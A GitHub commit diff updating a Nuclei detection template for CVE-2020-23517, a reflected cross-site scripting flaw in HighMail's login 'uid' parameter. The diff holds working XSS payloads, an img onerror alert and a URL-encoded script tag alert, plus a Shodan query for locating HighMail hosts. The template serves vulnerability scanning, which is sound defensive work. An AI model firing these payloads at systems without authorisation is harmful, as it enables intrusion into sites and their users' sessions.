Update CVE-2020-23517.yaml

patch-1
Ritik Chaddha 2022-07-02 18:29:01 +05:30 committed by GitHub
parent df36c380cd
commit cfba4d0de9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 12 additions and 3 deletions

View File

@ -13,21 +13,30 @@ info:
cvss-score: 6.1
cve-id: CVE-2020-23517
cwe-id: CWE-79
tags: xss,cve,cve2020
metadata:
verified: true
shodan-query: title:"HighMail"
tags: cve,cve2020,xss,cms,highmail
requests:
- method: GET
path:
- "{{BaseURL}}/login/?uid=\"><img%20src=\"x\"%20onerror=\"alert(%27XSS%27);\">"
- "{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- text/html
part: header
- type: word
words:
- "<img src=\"x\" onerror=\"alert('XSS')"
- 'value=""><script>alert(document.domain)</script>'
- type: status
status:
- 200
# Enhanced by mp on 2022/03/14